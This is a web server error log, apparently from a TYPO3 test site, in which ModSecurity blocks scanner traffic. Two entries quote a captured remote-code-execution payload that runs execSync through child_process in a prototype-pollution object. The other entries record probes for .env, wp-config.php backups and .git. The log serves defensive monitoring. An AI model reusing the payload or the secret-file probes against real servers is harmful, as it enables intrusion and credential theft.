[Thu Jan 08 23:54:03.647416 2026] [:error] [pid 1283304] [client 3.108.218.7:45826] [client 3.108.218.7] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271))) found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=process.mainmodule.require(child_process).execsync(echo $((41*271))).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWA1i2AwUIZgFNkik8yVXwAAAAg"]
[Thu Jan 08 23:54:03.648698 2026] [:error] [pid 1283304] [client 3.108.218.7:45826] [client 3.108.218.7] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWA1i2AwUIZgFNkik8yVXwAAAAg"]
[Thu Jan 08 23:54:03.648892 2026] [:error] [pid 1283304] [client 3.108.218.7:45826] [client 3.108.218.7] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWA1i2AwUIZgFNkik8yVXwAAAAg"]
[Thu Jan 08 23:54:05.523376 2026] [:error] [pid 1280390] [client 65.2.179.171:42684] [client 65.2.179.171] ModSecurity: Warning. Pattern match "(?:\\\\$(?:\\\\((?:\\\\(.*\\\\)|.*)\\\\)|\\\\{.*\\\\})|[<>]\\\\(.*\\\\))" at ARGS:0. [file "/usr/share/modsecurity-crs/rules/REQUEST-932-APPLICATION-ATTACK-RCE.conf"] [line "372"] [id "932130"] [msg "Remote Command Execution: Unix Shell Expression Found"] [data "Matched Data: $((41*271))) found within ARGS:0: {then:$1:__proto__:then status:resolved_model reason:-1 value:{then:$b1337} _response:{_prefix:var res=process.mainmodule.require(child_process).execsync(echo $((41*271))).tostring().trim() throw object.assign(new error(next_redirect) {digest: `next_redirect push/login?a=${res} 307 `}) _chunks:$q2 _formdata:{get:$1:constructor:constructor}}}"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-shell"] [tag "platform-unix"] [tag "attack-rce"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/COMMAND_INJECTION"] [tag "WASCTC/WASC-31"] [tag "OWASP_TOP_10/A1"] [tag "PCI/6.5.2"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWA1jdKTJIy7S9W5nL2LigAAAAk"]
[Thu Jan 08 23:54:05.524678 2026] [:error] [pid 1280390] [client 65.2.179.171:42684] [client 65.2.179.171] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWA1jdKTJIy7S9W5nL2LigAAAAk"]
[Thu Jan 08 23:54:05.524859 2026] [:error] [pid 1280390] [client 65.2.179.171:42684] [client 65.2.179.171] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=5,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/"] [unique_id "aWA1jdKTJIy7S9W5nL2LigAAAAk"]
[Fri Jan 09 00:05:18.135545 2026] [authz_core:error] [pid 1288540] [client 45.148.10.238:44696] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sat Jan 10 15:36:08.415922 2026] [:error] [pid 1312789] [client 45.148.10.63:50760] [client 45.148.10.63] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.production"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWJj2PnHq7u86L0CKDhtaQAAAAo"]
[Sat Jan 10 15:36:08.416156 2026] [:error] [pid 1312789] [client 45.148.10.63:50760] [client 45.148.10.63] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWJj2PnHq7u86L0CKDhtaQAAAAo"]
[Sat Jan 10 15:36:08.416321 2026] [:error] [pid 1312789] [client 45.148.10.63:50760] [client 45.148.10.63] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.production"] [unique_id "aWJj2PnHq7u86L0CKDhtaQAAAAo"]
[Sat Jan 10 15:36:12.514456 2026] [:error] [pid 1312677] [client 45.148.10.63:54896] [client 45.148.10.63] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWJj3OF87-UFon2IAHvtnQAAAAY"]
[Sat Jan 10 15:36:12.514601 2026] [:error] [pid 1312677] [client 45.148.10.63:54896] [client 45.148.10.63] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWJj3OF87-UFon2IAHvtnQAAAAY"]
[Sat Jan 10 15:36:12.514806 2026] [:error] [pid 1312677] [client 45.148.10.63:54896] [client 45.148.10.63] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWJj3OF87-UFon2IAHvtnQAAAAY"]
[Sat Jan 10 15:36:12.514966 2026] [:error] [pid 1312677] [client 45.148.10.63:54896] [client 45.148.10.63] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aWJj3OF87-UFon2IAHvtnQAAAAY"]
[Sat Jan 10 15:36:12.586706 2026] [:error] [pid 1312793] [client 45.148.10.63:54910] [client 45.148.10.63] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWJj3KXb4UBCJWDm51rh0wAAAA0"]
[Sat Jan 10 15:36:12.586919 2026] [:error] [pid 1312793] [client 45.148.10.63:54910] [client 45.148.10.63] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWJj3KXb4UBCJWDm51rh0wAAAA0"]
[Sat Jan 10 15:36:12.587075 2026] [:error] [pid 1312793] [client 45.148.10.63:54910] [client 45.148.10.63] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.save"] [unique_id "aWJj3KXb4UBCJWDm51rh0wAAAA0"]
[Sat Jan 10 15:36:16.682729 2026] [:error] [pid 1312457] [client 45.148.10.63:54924] [client 45.148.10.63] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWJj4CcWP2Ebg7yokQVQcAAAAAA"]
[Sat Jan 10 15:36:16.682871 2026] [:error] [pid 1312457] [client 45.148.10.63:54924] [client 45.148.10.63] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWJj4CcWP2Ebg7yokQVQcAAAAAA"]
[Sat Jan 10 15:36:16.683079 2026] [:error] [pid 1312457] [client 45.148.10.63:54924] [client 45.148.10.63] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWJj4CcWP2Ebg7yokQVQcAAAAAA"]
[Sat Jan 10 15:36:16.683223 2026] [:error] [pid 1312457] [client 45.148.10.63:54924] [client 45.148.10.63] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.backup"] [unique_id "aWJj4CcWP2Ebg7yokQVQcAAAAAA"]
[Sat Jan 10 15:36:18.756184 2026] [:error] [pid 1312777] [client 45.148.10.63:54928] [client 45.148.10.63] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp/.env"] [unique_id "aWJj4lMg4D7pkSVudQ8GVgAAAAg"]
[Sat Jan 10 15:36:18.756408 2026] [:error] [pid 1312777] [client 45.148.10.63:54928] [client 45.148.10.63] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp/.env"] [unique_id "aWJj4lMg4D7pkSVudQ8GVgAAAAg"]
[Sat Jan 10 15:36:18.756601 2026] [:error] [pid 1312777] [client 45.148.10.63:54928] [client 45.148.10.63] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp/.env"] [unique_id "aWJj4lMg4D7pkSVudQ8GVgAAAAg"]
[Sat Jan 10 15:36:20.881721 2026] [:error] [pid 1312459] [client 45.148.10.63:54930] [client 45.148.10.63] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /bootstrap/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/bootstrap/.env"] [unique_id "aWJj5LRr3zRxgVAVPjTAGAAAAAI"]
[Sat Jan 10 15:36:20.881944 2026] [:error] [pid 1312459] [client 45.148.10.63:54930] [client 45.148.10.63] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/bootstrap/.env"] [unique_id "aWJj5LRr3zRxgVAVPjTAGAAAAAI"]
[Sat Jan 10 15:36:20.882107 2026] [:error] [pid 1312459] [client 45.148.10.63:54930] [client 45.148.10.63] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/bootstrap/.env"] [unique_id "aWJj5LRr3zRxgVAVPjTAGAAAAAI"]
[Sat Jan 10 15:36:41.900124 2026] [authz_core:error] [pid 1312777] [client 45.148.10.63:36262] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php.bak
[Sat Jan 10 15:36:41.972204 2026] [:error] [pid 1312459] [client 45.148.10.63:36274] [client 45.148.10.63] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.txt"] [unique_id "aWJj-bRr3zRxgVAVPjTAGQAAAAI"]
[Sat Jan 10 15:36:41.972421 2026] [:error] [pid 1312459] [client 45.148.10.63:36274] [client 45.148.10.63] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.txt"] [unique_id "aWJj-bRr3zRxgVAVPjTAGQAAAAI"]
[Sat Jan 10 15:36:41.972568 2026] [:error] [pid 1312459] [client 45.148.10.63:36274] [client 45.148.10.63] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-config.php.txt"] [unique_id "aWJj-bRr3zRxgVAVPjTAGQAAAAI"]
[Sat Jan 10 15:36:50.047554 2026] [authz_core:error] [pid 1312678] [client 45.148.10.63:25648] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.git
[Sun Jan 11 00:25:00.483101 2026] [:error] [pid 1333015] [client 45.148.10.204:38812] [client 45.148.10.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWLfzCHHACbX62ZJopWnlwAAAAE"]
[Sun Jan 11 00:25:00.483326 2026] [:error] [pid 1333015] [client 45.148.10.204:38812] [client 45.148.10.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWLfzCHHACbX62ZJopWnlwAAAAE"]
[Sun Jan 11 00:25:00.483528 2026] [:error] [pid 1333015] [client 45.148.10.204:38812] [client 45.148.10.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env"] [unique_id "aWLfzCHHACbX62ZJopWnlwAAAAE"]
[Sun Jan 11 00:25:04.574181 2026] [:error] [pid 1333014] [client 45.148.10.204:38820] [client 45.148.10.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.development"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWLf0Lrfb-7cPSFNUw-hNAAAAAY"]
[Sun Jan 11 00:25:04.574443 2026] [:error] [pid 1333014] [client 45.148.10.204:38820] [client 45.148.10.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWLf0Lrfb-7cPSFNUw-hNAAAAAY"]
[Sun Jan 11 00:25:04.574622 2026] [:error] [pid 1333014] [client 45.148.10.204:38820] [client 45.148.10.204] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.development"] [unique_id "aWLf0Lrfb-7cPSFNUw-hNAAAAAY"]
[Sun Jan 11 00:25:04.710796 2026] [authz_core:error] [pid 1333012] [client 45.148.10.204:38826] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.env.bak
[Sun Jan 11 00:25:08.823785 2026] [:error] [pid 1333013] [client 45.148.10.204:47094] [client 45.148.10.204] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /wp-content/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aWLf1HP26iTcPSppCtdZIAAAAAU"]
[Sun Jan 11 00:25:08.824014 2026] [:error] [pid 1333013] [client 45.148.10.204:47094] [client 45.148.10.204] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/wp-content/.env"] [unique_id "aWLf1HP26iTcPSppCtdZIAAAAAU"]
